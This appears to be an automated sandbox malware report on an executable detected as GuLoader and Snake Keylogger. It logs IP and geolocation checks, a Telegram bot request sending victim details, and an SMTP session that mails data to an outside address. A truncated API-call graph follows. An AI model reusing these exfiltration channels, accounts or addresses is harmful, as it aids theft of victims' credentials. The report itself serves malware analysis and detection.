Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 5903d59eacd98c88210978133145dfc8
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49724 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:55.265676975 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:36:56.994812012 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:56 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 8dd2abe7dd26a1ce071f7ffec75f2eb6
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49726 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:36:57.775499105 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:37:00.246047974 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:37:00 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 07102b136d0ae98c03aef04928ebc03b
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.8 | 49728 | 193.122.130.0 | 80 | 5916 | C:\Users\user\Desktop\________.exe

Timestamp | Bytes transferred | Direction | Data
Nov 12, 2024 07:37:01.014020920 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Nov 12, 2024 07:37:02.744673014 CET | 323 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:37:02 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d0a990db193ecbadeeea9913152c69b9
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.68</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.8 | 49716 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:49 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-12 06:36:49 UTC | 854 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:49 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14632
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3wwk97iwd4CWPZOkUw1pSWXtUIwocWFcigmVogmD%2BJQW8gsIu%2FviPHeOH%2BhuJEk%2Fkbz63znweH7ZgUl0OV8Gp2SzL3ABa2ZwO80eNuAUFR486dSvl%2Bk9XT8EjSxnXnbjVI9xIhnA"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e148287bd8a4799-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1876&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1547835&cwnd=247&unsent_bytes=0&cid=c199c2a92c927df2&ts=222&x=0"
2024-11-12 06:36:49 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.8 | 49717 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:50 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-12 06:36:50 UTC | 846 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:50 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14633
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k1HiriwtxyLs7CFHf9JqtNoLDHcLsX94ZL9h9PjFzBuyA1eqDliN3JfNkMa7lUVat5FoPjKtfg%2BPKrMqdKg96qs93b3d9YT4EJy1nlZBcZUPnznrplQZrwUMgZ1kk2KSfgCR6Pwg"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e14828dff74e71e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2218&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1316962&cwnd=235&unsent_bytes=0&cid=c6b6022c044f01f2&ts=154&x=0"
2024-11-12 06:36:50 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.8 | 49719 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:52 UTC | 63 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
2024-11-12 06:36:52 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:52 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14635
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wGQvtMdZAvXSdubkCHtpjw22xZEC77ZJ4%2FDRfmhFRpv6B%2BTTYQ9FiEEjUEIj2D9SD0N1BoL3LPKNwTSiXktjZBCiS%2F9f0RyRu61kBCEYnf2FAos2pzTArdX8q%2BzxkMyaMm377q8S"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e14829b0eb72c87-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1161&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2375717&cwnd=228&unsent_bytes=0&cid=76e7321897af4200&ts=144&x=0"
2024-11-12 06:36:52 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.8 | 49721 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:53 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-12 06:36:53 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:53 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14636
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bxg6uoI%2B%2B65%2FbW5HMzyV%2FiuEDbqFpI0Px9nd1dCIY56LyZBvwERer%2Bc3oeKxcN%2Flen3PypOMyHuFJ0mRnhLHzh7k6BSMdMIzID9RNHIZAvSBG6TALWeH2UtPbNMzWlwphqtfTyID"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1482a41e412cda-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1586&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1771253&cwnd=251&unsent_bytes=0&cid=81685d3ccc3213ef&ts=150&x=0"
2024-11-12 06:36:53 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.8 | 49723 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:55 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-12 06:36:55 UTC | 856 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:55 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14638
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ikWQK0qCqSD75HutL%2BuhJWmyQ1zJZRkIOiVws3%2BKWs26oZ1qrRhDlnMSMvzGHlFJc29HxFBMQbl%2FyeGnesJhiDBgaSOwwYXU4r%2BD%2B03xOzLcSXLgOmuHz9UkGEu%2BOr80KRDFn4cb"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1482acec2e6b57-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1041&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2760724&cwnd=233&unsent_bytes=0&cid=a87a8a7fbb3a8ce9&ts=144&x=0"
2024-11-12 06:36:55 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.8 | 49725 | 188.114.96.34 | 443 | 5916 | C:\Users\user\Desktop\________.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-12 06:36:57 UTC | 87 | OUT | GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-11-12 06:36:57 UTC | 852 | IN | HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:36:57 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14640
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RJnTrVUWZKGXTHX40GuS%2F2%2FkLtc7RStWG%2BYA%2FFyqhMGoXHxroe4QRSgMHrjLqV32r398fZ7YP5Woz8FqCmXK0iVTC8rQxROlYEBl9dtFf9wDQcm23Y1KfIZvthdfzhiNA3kdLYY9"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1482bc88474791-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1202&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2425460&cwnd=244&unsent_bytes=0&cid=8bfca71eb9b2474b&ts=149&x=0"
2024-11-12 06:36:57 UTC | 359 | IN | Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 6, Source IP: 192.168.2.8, Source Port: 49727, Destination IP: 188.114.97.3, Destination Port: 443, PID: 5916, Process: C:\Users\user\Desktop\________.exe
Timestamp: 2024-11-12 06:37:00 UTC, Bytes transferred: 87, Direction: OUT, Data:
GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-11-12 06:37:01 UTC, Bytes transferred: 856, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:37:00 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14643
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DYR1jjiTf801byK57z4Ebt2zTz8LG%2ByNMLkKmNsQFpI%2BHrZlq2nVhhWHd4SNOkwkiqgTEvSI3K0q%2FjphkUsbYCqWBMEvXzw9zl4%2BlrwcSk2hSxlLh06pEs%2BPI8w9MjRX2h4fSpe%2B"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1482d0c9e2e756-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1150&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=2456318&cwnd=251&unsent_bytes=0&cid=72fec31a94f3b412&ts=149&x=0"
Timestamp: 2024-11-12 06:37:01 UTC, Bytes transferred: 359, Direction: IN, Data:
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 7, Source IP: 192.168.2.8, Source Port: 49729, Destination IP: 188.114.97.3, Destination Port: 443, PID: 5916, Process: C:\Users\user\Desktop\________.exe
Timestamp: 2024-11-12 06:37:03 UTC, Bytes transferred: 87, Direction: OUT, Data:
GET /xml/173.254.250.68 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
Timestamp: 2024-11-12 06:37:03 UTC, Bytes transferred: 864, Direction: IN, Data:
HTTP/1.1 200 OK
Date: Tue, 12 Nov 2024 06:37:03 GMT
Content-Type: text/xml
Content-Length: 359
Connection: close
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 14646
Last-Modified: Tue, 12 Nov 2024 02:32:57 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fdc9%2Ba6kKKclbK5%2Bv8zpl6YdN40LTmDw%2FvSg9KzhNNeczV85Hh%2FJ4CRkIJi%2FTgZQBBBn%2FqyIju0MtZ8p5uxvA9H%2BGOqMD89H%2Bbiwo%2BP0zLBpSdWlxPednmwPzq%2FxPgbaiWIyt8YV"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e1482e05ee96c3d-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=2006&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=701&delivery_rate=1428007&cwnd=239&unsent_bytes=0&cid=52f1a5f7ba0cb1c6&ts=147&x=0"
Timestamp: 2024-11-12 06:37:03 UTC, Bytes transferred: 359, Direction: IN, Data:
Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 36 38 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e
Data Ascii: <Response><IP>173.254.250.68</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</TimeZone>


Session ID: 8, Source IP: 192.168.2.8, Source Port: 49730, Destination IP: 149.154.167.220, Destination Port: 443, PID: 5916, Process: C:\Users\user\Desktop\________.exe
Timestamp: 2024-11-12 06:37:04 UTC, Bytes transferred: 349, Direction: OUT, Data:
GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:141700%0D%0ADate%20and%20Time:%2012/11/2024%20/%2018:46:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20141700%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
Host: api.telegram.org
Connection: Keep-Alive
Timestamp: 2024-11-12 06:37:04 UTC, Bytes transferred: 344, Direction: IN, Data:
HTTP/1.1 404 Not Found
Server: nginx/1.18.0
Date: Tue, 12 Nov 2024 06:37:04 GMT
Content-Type: application/json
Content-Length: 55
Connection: close
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Access-Control-Allow-Origin: *
Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Timestamp: 2024-11-12 06:37:04 UTC, Bytes transferred: 55, Direction: IN, Data:
Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


Timestamp: Nov 12, 2024 07:37:11.544866085 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands:
220-server42.hndservers.net ESMTP Exim 4.98 #2 Tue, 12 Nov 2024 11:37:11 +0500
220-We do not authorize the use of this system to transport unsolicited,
220 and/or bulk e-mail.
Timestamp: Nov 12, 2024 07:37:11.545109987 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: EHLO 141700
Timestamp: Nov 12, 2024 07:37:11.808736086 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands:
250-server42.hndservers.net Hello 141700 [173.254.250.68]
250-SIZE 104857600
250-LIMITS MAILMAX=1000 RCPTMAX=50000
250-8BITMIME
250-PIPELINING
250-PIPECONNECT
250-AUTH PLAIN LOGIN
250-STARTTLS
250 HELP
Timestamp: Nov 12, 2024 07:37:11.809822083 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: AUTH login d2FqYWhhdEBmb29kZXguY29tLnBr
Timestamp: Nov 12, 2024 07:37:12.073113918 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 334 UGFzc3dvcmQ6
Timestamp: Nov 12, 2024 07:37:12.386077881 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 235 Authentication succeeded
Timestamp: Nov 12, 2024 07:37:12.386405945 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: MAIL FROM:<wajahat@foodex.com.pk>
Timestamp: Nov 12, 2024 07:37:12.651034117 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 250 OK
Timestamp: Nov 12, 2024 07:37:12.651307106 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: RCPT TO:<millions1000@proton.me>
Timestamp: Nov 12, 2024 07:37:12.938110113 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 250 Accepted
Timestamp: Nov 12, 2024 07:37:12.938277006 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: DATA
Timestamp: Nov 12, 2024 07:37:13.201390982 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 354 Enter message, ending with "." on a line by itself
Timestamp: Nov 12, 2024 07:37:13.202430010 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: .
Timestamp: Nov 12, 2024 07:37:13.806675911 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 250 OK id=1tAkWX-0000000EDpY-12X2
Timestamp: Nov 12, 2024 07:38:50.484103918 CET, Source Port: 49731, Dest Port: 587, Source IP: 192.168.2.8, Dest IP: 37.27.123.72, Commands: QUIT
Timestamp: Nov 12, 2024 07:38:50.947993040 CET, Source Port: 587, Dest Port: 49731, Source IP: 37.27.123.72, Dest IP: 192.168.2.8, Commands: 221 server42.hndservers.net closing connection

Target ID:1
Start time:01:36:16
Start date:12/11/2024
Path:C:\Users\user\Desktop\________.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\________.exe"
Imagebase:0x400000
File size:847'584 bytes
MD5 hash:89B3B4723EA3983FC0F103EAF3093EDC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1623677806.000000000330D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:true

Target ID:3
Start time:01:36:30
Start date:12/11/2024
Path:C:\Users\user\Desktop\________.exe
Wow64 process (32bit):true
Commandline:"C:\Users\user\Desktop\________.exe"
Imagebase:0x400000
File size:847'584 bytes
MD5 hash:89B3B4723EA3983FC0F103EAF3093EDC
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000003.00000002.3975771250.0000000032D61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.3975771250.0000000032E67000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:low
Has exited:false

Execution Graph

Execution Coverage:19.5%
Dynamic/Decrypted Code Coverage:15.2%
Signature Coverage:19%
Total number of Nodes:1504
Total number of Limit Nodes:46
calls 4405->4409 4408 402b3a 18 API calls 4406->4408 4410 402b3a 18 API calls 4407->4410 4412 40227d 4407->4412 4408->4405 4409->4407 4410->4412 4411 402b3a 18 API calls 4413 402286 WritePrivateProfileStringW 4411->4413 4412->4411 5177 4052d3 5178 4052f4 GetDlgItem GetDlgItem GetDlgItem 5177->5178 5179 40547f 5177->5179 5222 404164 SendMessageW 5178->5222 5180 4054b0 5179->5180 5181 405488 GetDlgItem CreateThread CloseHandle 5179->5181 5184 4054db 5180->5184 5185 405500 5180->5185 5186 4054c7 ShowWindow ShowWindow 5180->5186 5181->5180 5183 405365 5188 40536c GetClientRect GetSystemMetrics SendMessageW SendMessageW 5183->5188 5187 40553b 5184->5187 5190 405515 ShowWindow 5184->5190 5191 4054ef 5184->5191 5192 404196 8 API calls 5185->5192 5224 404164 SendMessageW 5186->5224 5187->5185 5195 405549 SendMessageW 5187->5195 5193 4053db 5188->5193 5194 4053bf SendMessageW SendMessageW 5188->5194 5197 405535 5190->5197 5198 405527 5190->5198 5196 404108 SendMessageW 5191->5196 5203 40550e 5192->5203 5200 4053e0 SendMessageW 5193->5200 5201 4053ee 5193->5201 5194->5193 5202 405562 CreatePopupMenu 5195->5202 5195->5203 5196->5185 5199 404108 SendMessageW 5197->5199 5204 405194 25 API calls 5198->5204 5199->5187 5200->5201 5206 40412f 19 API calls 5201->5206 5205 405f0c 18 API calls 5202->5205 5204->5197 5207 405572 AppendMenuW 5205->5207 5208 4053fe 5206->5208 5209 4055a2 TrackPopupMenu 5207->5209 5210 40558f GetWindowRect 5207->5210 5211 405407 ShowWindow 5208->5211 5212 40543b GetDlgItem SendMessageW 5208->5212 5209->5203 5213 4055bd 5209->5213 5210->5209 5214 40542a 5211->5214 5215 40541d ShowWindow 5211->5215 5212->5203 5216 405462 SendMessageW SendMessageW 5212->5216 5217 4055d9 SendMessageW 5213->5217 5223 404164 SendMessageW 5214->5223 5215->5214 5216->5203 5217->5217 5218 4055f6 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 5217->5218 5220 40561b SendMessageW 5218->5220 5220->5220 5221 405644 GlobalUnlock SetClipboardData CloseClipboard 5220->5221 5221->5203 
5222->5183 5223->5212 5224->5184 4414 402454 4415 402c44 19 API calls 4414->4415 4416 40245e 4415->4416 4417 402b1d 18 API calls 4416->4417 4418 402467 4417->4418 4419 402793 4418->4419 4420 40248b RegEnumValueW 4418->4420 4421 40247f RegEnumKeyW 4418->4421 4420->4419 4422 4024a4 RegCloseKey 4420->4422 4421->4422 4422->4419 5225 401ed4 5226 402b3a 18 API calls 5225->5226 5227 401edb 5226->5227 5228 40622d 2 API calls 5227->5228 5229 401ee1 5228->5229 5231 401ef2 5229->5231 5232 405e31 wsprintfW 5229->5232 5232->5231 4424 4022d5 4425 402305 4424->4425 4426 4022da 4424->4426 4427 402b3a 18 API calls 4425->4427 4428 402c44 19 API calls 4426->4428 4429 40230c 4427->4429 4430 4022e1 4428->4430 4437 402b7a RegOpenKeyExW 4429->4437 4431 4022eb 4430->4431 4436 402324 4430->4436 4432 402b3a 18 API calls 4431->4432 4433 4022f2 RegDeleteValueW RegCloseKey 4432->4433 4433->4436 4443 402ba5 4437->4443 4446 402322 4437->4446 4438 402bcb RegEnumKeyW 4439 402bdd RegCloseKey 4438->4439 4438->4443 4441 406254 3 API calls 4439->4441 4440 402c02 RegCloseKey 4440->4446 4444 